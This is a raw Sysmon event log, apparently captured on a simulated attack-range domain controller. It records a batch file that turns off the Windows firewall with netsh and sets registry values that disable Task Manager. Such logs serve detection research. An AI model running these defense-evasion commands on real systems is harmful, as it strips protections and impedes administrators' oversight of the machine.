12:04:39.442{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.442{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3501-00000000AE01}7144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.442{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3501-00000000AE01}7144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.453{266CAFBE-6557-6064-3501-00000000AE01}7144C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableTaskMgr" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.442{266CAFBE-6557-6064-3401-00000000AE01}6180C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgrDWORD (0x00000001) 10341000x80000000000000009348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.442{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3401-00000000AE01}6180C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.427{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.427{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.427{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.427{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.427{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3401-00000000AE01}6180C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.427{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3401-00000000AE01}6180C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.441{266CAFBE-6557-6064-3401-00000000AE01}6180C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableTaskMgr" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.427{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x0000061b) 13241300x80000000000000009339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:04:39.411{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 13241300x80000000000000009338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1089SetValue2021-03-31 12:04:39.411{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewallDWORD (0x00000000) 10341000x80000000000000009337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.411{266CAFBE-646C-6064-1600-00000000AE01}15841864C:\Windows\system32\svchost.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+6edd7|c:\windows\system32\mpssvc.dll+8bf86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.411{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.411{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000009334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:04:39.380{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IKEEXT\StartDWORD (0x00000002) 10341000x80000000000000009333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.380{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.380{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.364{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.364{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.364{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.376{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\System32\netsh.exe10.0.14393.0 (rs1_release.160715-1616)Network Command ShellMicrosoft® Windows® Operating SystemMicrosoft Corporationnetsh.exenetsh advfirewall set currentprofile state offC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=4D51BCD0B94D09F5DFB80DF754D31E28,SHA256=E5888E649C881E4BBBCE472F6808F93B2B5564D3094995A5A08E66B2406C1607,IMPHASH=51DC8B92EF1620527201E5276E21BCA7{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 17141700x80000000000000009323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:04:39.364{266CAFBE-646D-6064-1800-00000000AE01}2092\Winsock2\CatalogChangeListener-82c-0C:\Windows\system32\svchost.exe 13241300x80000000000000009322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.349{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x0000061a) 
